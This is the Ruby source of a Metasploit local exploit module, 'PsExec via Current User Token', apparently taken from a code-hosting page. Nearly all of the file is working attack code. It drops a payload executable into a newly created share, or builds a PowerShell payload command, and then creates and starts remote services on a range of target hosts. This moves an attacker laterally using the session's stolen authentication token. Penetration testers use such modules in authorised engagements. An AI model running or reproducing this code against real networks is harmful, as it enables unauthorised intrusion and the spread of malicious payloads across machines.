156 lines
5.7 KiB
Ruby
156 lines
5.7 KiB
Ruby
##
|
|
# This module requires Metasploit: http://metasploit.com/download
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
|
##
|
|
|
|
require 'msf/core'
|
|
require 'rex'
|
|
require 'msf/core/exploit/powershell'
|
|
require 'msf/core/exploit/exe'
|
|
|
|
class Metasploit3 < Msf::Exploit::Local
|
|
Rank = ExcellentRanking
|
|
|
|
include Post::Windows::Services
|
|
include Exploit::EXE
|
|
include Exploit::Powershell
|
|
include Post::File
|
|
|
|
def initialize(info={})
|
|
super( update_info( info,
|
|
'Name' => 'PsExec via Current User Token',
|
|
'Description' => %q{
|
|
This module uploads an executable file to the victim system, creates
|
|
a share containing that executable, creates a remote service on each
|
|
target system using a UNC path to that file, and finally starts the
|
|
service(s).
|
|
|
|
The result is similar to psexec but with the added benefit of using
|
|
the session's current authentication token instead of having to know
|
|
a password or hash.
|
|
},
|
|
'License' => MSF_LICENSE,
|
|
'Author' => [
|
|
'egypt',
|
|
'jabra' # Brainstorming and help with original technique
|
|
],
|
|
'References' => [
|
|
# same as for windows/smb/psexec
|
|
[ 'CVE', '1999-0504'], # Administrator with no password (since this is the default)
|
|
[ 'OSVDB', '3106'],
|
|
[ 'URL', 'http://technet.microsoft.com/en-us/sysinternals/bb897553.aspx' ]
|
|
],
|
|
'DefaultOptions' =>
|
|
{
|
|
'WfsDelay' => 10,
|
|
},
|
|
'DisclosureDate' => 'Jan 01 1999',
|
|
'Arch' => [ARCH_X86, ARCH_X86_64],
|
|
'Platform' => [ 'win' ],
|
|
'SessionTypes' => [ 'meterpreter' ],
|
|
'Targets' => [ [ 'Universal', {} ] ],
|
|
'DefaultTarget' => 0
|
|
))
|
|
|
|
register_options([
|
|
OptString.new("INTERNAL_ADDRESS", [
|
|
false,
|
|
"Session's internal address or hostname for the victims to grab the "+
|
|
"payload from (Default: detected)"
|
|
]),
|
|
OptString.new("NAME", [ false, "Service name on each target in RHOSTS (Default: random)" ]),
|
|
OptString.new("DISPNAME", [ false, "Service display name (Default: random)" ]),
|
|
OptEnum.new("TECHNIQUE", [ true, "Technique to use", 'PSH', ['PSH', 'SMB'] ]),
|
|
OptAddressRange.new("RHOSTS", [ false, "Target address range or CIDR identifier" ]),
|
|
OptBool.new("KERBEROS", [ true, "Authenticate via Kerberos, dont resolve hostnames", false ])
|
|
])
|
|
end
|
|
|
|
def exploit
|
|
name = datastore["NAME"] || Rex::Text.rand_text_alphanumeric(10)
|
|
display_name = datastore["DISPNAME"] || Rex::Text.rand_text_alphanumeric(10)
|
|
if datastore['TECHNIQUE'] == 'SMB'
|
|
# XXX Find the domain controller
|
|
|
|
#share_host = datastore["INTERNAL_ADDRESS"] || detect_address
|
|
share_host = datastore["INTERNAL_ADDRESS"] || session.session_host
|
|
print_status "Using #{share_host} as the internal address for victims to get the payload from"
|
|
|
|
# Build a random name for the share and directory
|
|
share_name = Rex::Text.rand_text_alphanumeric(8)
|
|
drive = session.sys.config.getenv('SYSTEMDRIVE')
|
|
share_dir = "#{drive}\\#{share_name}"
|
|
|
|
# Create them
|
|
print_status("Creating share #{share_dir}")
|
|
session.fs.dir.mkdir(share_dir)
|
|
cmd_exec("net share #{share_name}=#{share_dir}")
|
|
|
|
# Generate an executable from the shellcode and drop it in the share
|
|
# directory
|
|
filename = "#{Rex::Text.rand_text_alphanumeric(8)}.exe"
|
|
payload_exe = generate_payload_exe_service(
|
|
:servicename => name,
|
|
# XXX Ghetto
|
|
:arch => payload.send(:pinst).arch.first
|
|
)
|
|
|
|
print_status("Dropping payload #{filename}")
|
|
write_file("#{share_dir}\\#{filename}", payload_exe)
|
|
|
|
service_executable = "\\\\#{share_host}\\#{share_name}\\#{filename}"
|
|
else
|
|
service_executable = cmd_psh_payload(payload.encoded, payload_instance.arch.first)
|
|
end
|
|
|
|
begin
|
|
if datastore['KERBEROS']
|
|
targets = datastore['RHOSTS'].split(', ').map{ |a| a.split(' ') }.flatten
|
|
else
|
|
targets = Rex::Socket::RangeWalker.new(datastore["RHOSTS"])
|
|
end
|
|
|
|
targets.each do |server|
|
|
begin
|
|
print_status("#{server.ljust(16)} Creating service #{name}")
|
|
|
|
service_create(name,
|
|
{
|
|
:display => display_name,
|
|
:path => service_executable,
|
|
:starttype=> "START_TYPE_MANUAL"
|
|
},
|
|
server)
|
|
|
|
# If everything went well, this will create a session. If not, it
|
|
# might be permissions issues or possibly we failed to create the
|
|
# service.
|
|
print_status("#{server.ljust(16)} Starting the service")
|
|
service_start(name, server)
|
|
|
|
print_status("#{server.ljust(16)} Deleting the service")
|
|
service_delete(name, server)
|
|
rescue Rex::TimeoutError
|
|
vprint_status("#{server.ljust(16)} Timed out...")
|
|
next
|
|
rescue RuntimeError, ::Rex::Post::Meterpreter::RequestError
|
|
print_error("Exception running payload: #{$!.class} : #{$!}")
|
|
print_warning("#{server.ljust(16)} WARNING: May have failed to clean up!")
|
|
print_warning("#{server.ljust(16)} Try a command like: sc \\\\#{server}\\ delete #{name}")
|
|
next
|
|
end
|
|
end
|
|
ensure
|
|
if datastore['TECHNIQUE'] == 'SMB'
|
|
print_status("Deleting share #{share_name}")
|
|
cmd_exec("net share #{share_name} /delete /y")
|
|
print_status("Deleting files #{share_dir}")
|
|
cmd_exec("cmd /c rmdir /q /s #{share_dir}")
|
|
end
|
|
end
|
|
|
|
end
|
|
|
|
end
|
|
|